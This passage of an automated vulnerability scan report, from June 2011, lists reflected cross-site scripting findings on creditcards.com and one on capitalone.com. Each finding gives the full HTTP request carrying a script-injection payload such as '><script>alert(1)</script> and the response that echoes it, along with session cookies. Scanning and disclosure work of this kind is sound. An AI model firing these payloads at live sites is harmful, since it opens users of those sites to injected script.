Set-Cookie: caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; domain=.capitalone.com; expires=Monday, 14-Jun-2021 11:59:21 GMT; path=/
Set-Cookie: SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:21 GMT; path=/
Set-Cookie: external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a';alert(1)//fd5f10cff0; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:21 GMT; path=/
Set-Cookie: portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:21 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
Content-Length: 39021

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US"><head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/><meta http-e
...[SNIP]...
; //1st page of the application
lpAddVars('page','Start_OrderTotal',''); //1st page of the application
lpAddVars('session','ExternalID','GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a';alert(1)//fd5f10cff0'); //All pages
lpAddVars('session','PffsrcID',''); //All pages
lpAddVars('session','EosUser',''); //All pages
lpAddVars('session','TestCell','02'); //All pages
lpAddVar
...[SNIP]...

3.10. http://www.creditcards.com/business.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/business.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3edd7'><script>alert(1)</script>8b633d41d62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /business.php?3edd7'><script>alert(1)</script>8b633d41d62=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/points-rewards.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308311437978272; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; SSBAL=node.web1; s_cc=true; CCsCookieimp=1308311914; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311931237%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Apoints-rewards%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/business.php%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:14 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 43493

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<title>Business Credit Cards - CreditCards.com</title>
<meta name="keywords"
...[SNIP]...
<IMG SRC='http://www.creditcards.com/xtrack.php?3edd7'><script>alert(1)</script>8b633d41d62=1' border=0 width=1 height=1>
...[SNIP]...

3.11. http://www.creditcards.com/low-interest-page-4.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/low-interest-page-4.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9e8f9'><script>alert(1)</script>dbc00122aec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /low-interest-page-4.php?9e8f9'><script>alert(1)</script>dbc00122aec=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/low-interest.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308312739652864; PHPSESSID=51aa464adc6191c5beb2eec47b2e003f; ACTREF=51aa464adc6191c5beb2eec47b2e003f_999__201106170712; CURRREF=999; THIRDREF=999; PREVREF=999; SSBAL=node.web1; s_cc=true; CCsCookieimp=1308312780; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308312000435%27%5D%2C%5B%27999-0-0-0%27%2C%271308313704660%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Alow-interest%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/low-interest-page-4.php%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:29:42 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 29157

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<title>Low Interest Credit Cards - CreditCards.com</title>
<meta name="keywo
...[SNIP]...
<IMG SRC='http://www.creditcards.com/xtrack.php?9e8f9'><script>alert(1)</script>dbc00122aec=1' border=0 width=1 height=1>
...[SNIP]...

3.12. http://www.creditcards.com/low-interest.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/low-interest.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 86305'><script>alert(1)</script>bb92682d3cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /low-interest.php?86305'><script>alert(1)</script>bb92682d3cf=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; CCsCookieimp=1308312001; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308312739652864; PHPSESSID=51aa464adc6191c5beb2eec47b2e003f; ACTREF=51aa464adc6191c5beb2eec47b2e003f_999__201106170712; CURRREF=999; THIRDREF=999; PREVREF=999; SSBAL=node.web1; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308312000435%27%5D%2C%5B%27999-0-0-0%27%2C%271308312744303%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253Dhome%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/low-interest.php%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:13:49 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 43469

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<title>Low Interest Credit Cards - CreditCards.com</title>
<meta name="keywo
...[SNIP]...
<IMG SRC='http://www.creditcards.com/xtrack.php?86305'><script>alert(1)</script>bb92682d3cf=1' border=0 width=1 height=1>
...[SNIP]...

3.13. http://www.creditcards.com/oc/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8f62c'><script>alert(1)</script>f62cca6f582 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /oc/?pid=22105561&pg=17&pgpos=1&8f62c'><script>alert(1)</script>f62cca6f582=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/business.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308311437978272; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; SSBAL=node.web1; s_cc=true; CCsCookieimp=1308311932; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311937698%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Abusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/oc/%25253Fpid%25253D22105561%252526pg%25253D17%252526pgpos%25253D1%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:59 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=17&pos=1&evid=1011106170650383a0cd48cdfdd3a86c&ref=&oid=1012011061706595961146364&data3=0&sid=1889&c=22105561
Vary: Accept-Encoding
Content-Length: 3147
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 11:59:59 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<
...[SNIP]...
<IMG SRC='http://www.creditcards.com/xtrack.php?pid=22105561&pg=17&pgpos=1&8f62c'><script>alert(1)</script>f62cca6f582=1' border=0 width=1 height=1>
...[SNIP]...

3.14. http://www.creditcards.com/oc/ [pg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The value of the pg request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload abbd6'><script>alert(1)</script>6edbc9715c7 was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /oc/?pid=22105561&pg=17abbd6'><script>alert(1)</script>6edbc9715c7&pgpos=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/business.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308311437978272; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; SSBAL=node.web1; s_cc=true; CCsCookieimp=1308311932; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311937698%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Abusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/oc/%25253Fpid%25253D22105561%252526pg%25253D17%252526pgpos%25253D1%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:14 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=17abbd6%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6edbc9715c7&pos=1&evid=1011106170650383a0cd48cdfdd3a86c&ref=&oid=1012011061706591481395395&data3=0&sid=1889&c=22105561
Vary: Accept-Encoding
Content-Length: 3230
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 11:59:14 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<
...[SNIP]...
<IMG SRC='http://www.creditcards.com/xtrack.php?pid=22105561&pg=17abbd6'><script>alert(1)</script>6edbc9715c7&pgpos=1' border=0 width=1 height=1>
...[SNIP]...

3.15. http://www.creditcards.com/oc/ [pg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7722d"%3balert(1)//57eec6dc958 was submitted in the pg parameter. This input was echoed as 7722d";alert(1)//57eec6dc958 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /oc/?pid=22105561&pg=177722d"%3balert(1)//57eec6dc958&pgpos=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/business.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308311437978272; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; SSBAL=node.web1; s_cc=true; CCsCookieimp=1308311932; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311937698%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Abusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/oc/%25253Fpid%25253D22105561%252526pg%25253D17%252526pgpos%25253D1%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:14 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=177722d%22%3Balert%281%29%2F%2F57eec6dc958&pos=1&evid=1011106170650383a0cd48cdfdd3a86c&ref=&oid=1012011061706591495452399&data3=0&sid=1889&c=22105561
Vary: Accept-Encoding
Content-Length: 3187
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 11:59:14 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<
...[SNIP]...
op3=""
s.prop4=""
s.prop5=""
s.prop6=""
s.prop7=""
s.prop8=""
s.prop12=s.c_r('s_vi');
s.prop16="1"
/* Conversion Variables */
s.campaign=""
s.state=""
s.zip=""
s.events="purchase,event2"
s.products="177722d";alert(1)//57eec6dc958;22105561;1;0"
s.purchaseID="1012011061706591495452399"
s.eVar1=""
s.eVar2=""
s.eVar3=""
s.eVar4=""
s.eVar5=""
s.eVar6=""
s.eVar7=""
s.eVar8=""
s.eVar25="177722d";alert(1)//57eec6dc958"
s.eVar26="1"
s.
...[SNIP]...

3.16. http://www.creditcards.com/oc/ [pgpos parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The value of the pgpos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34c7b"%3balert(1)//6aca4030e70 was submitted in the pgpos parameter. This input was echoed as 34c7b";alert(1)//6aca4030e70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /oc/?pid=22105561&pg=17&pgpos=134c7b"%3balert(1)//6aca4030e70 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/business.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308311437978272; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; SSBAL=node.web1; s_cc=true; CCsCookieimp=1308311932; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311937698%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Abusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/oc/%25253Fpid%25253D22105561%252526pg%25253D17%252526pgpos%25253D1%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:19 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=17&pos=134c7b%22%3Balert%281%29%2F%2F6aca4030e70&evid=1011106170650383a0cd48cdfdd3a86c&ref=&oid=1012011061706591965932292&data3=0&sid=1889&c=22105561
Vary: Accept-Encoding
Content-Length: 3187
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 11:59:19 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<
...[SNIP]...
nes. */
s.pageName="lead confirmation"
s.server=""
s.channel=""
s.pageType=""
s.prop1=""
s.prop2=""
s.prop3=""
s.prop4=""
s.prop5=""
s.prop6=""
s.prop7=""
s.prop8=""
s.prop12=s.c_r('s_vi');
s.prop16="134c7b";alert(1)//6aca4030e70"
/* Conversion Variables */
s.campaign=""
s.state=""
s.zip=""
s.events="purchase,event2"
s.products="17;22105561;1;0"
s.purchaseID="1012011061706591965932292"
s.eVar1=""
s.eVar2=""
s.eVar3=""
s.eVar4=
...[SNIP]...

3.17. http://www.creditcards.com/oc/ [pgpos parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The value of the pgpos request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 62eb3'><script>alert(1)</script>a51d3ec71e4 was submitted in the pgpos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /oc/?pid=22105561&pg=17&pgpos=162eb3'><script>alert(1)</script>a51d3ec71e4 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/business.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308311437978272; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; SSBAL=node.web1; s_cc=true; CCsCookieimp=1308311932; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311937698%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Abusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/oc/%25253Fpid%25253D22105561%252526pg%25253D17%252526pgpos%25253D1%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:18 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=17&pos=162eb3%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ea51d3ec71e4&evid=1011106170650383a0cd48cdfdd3a86c&ref=&oid=1012011061706591825302258&data3=0&sid=1889&c=22105561
Vary: Accept-Encoding
Content-Length: 3230
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 11:59:18 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<
...[SNIP]...
<IMG SRC='http://www.creditcards.com/xtrack.php?pid=22105561&pg=17&pgpos=162eb3'><script>alert(1)</script>a51d3ec71e4' border=0 width=1 height=1>
...[SNIP]...

3.18. http://www.creditcards.com/oc/ [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a930"%3balert(1)//b128c8fd28 was submitted in the pid parameter. This input was echoed as 1a930";alert(1)//b128c8fd28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /oc/?pid=221055611a930"%3balert(1)//b128c8fd28&pg=17&pgpos=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/business.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308311437978272; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; SSBAL=node.web1; s_cc=true; CCsCookieimp=1308311932; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311937698%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Abusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/oc/%25253Fpid%25253D22105561%252526pg%25253D17%252526pgpos%25253D1%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:11 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=17&pos=1&evid=1011106170650383a0cd48cdfdd3a86c&ref=&oid=1012011061706591170368870&data3=0&sid=1889&c=221055611a930%22%3Balert%281%29%2F%2Fb128c8fd28
Vary: Accept-Encoding
Content-Length: 2811
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 11:59:11 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
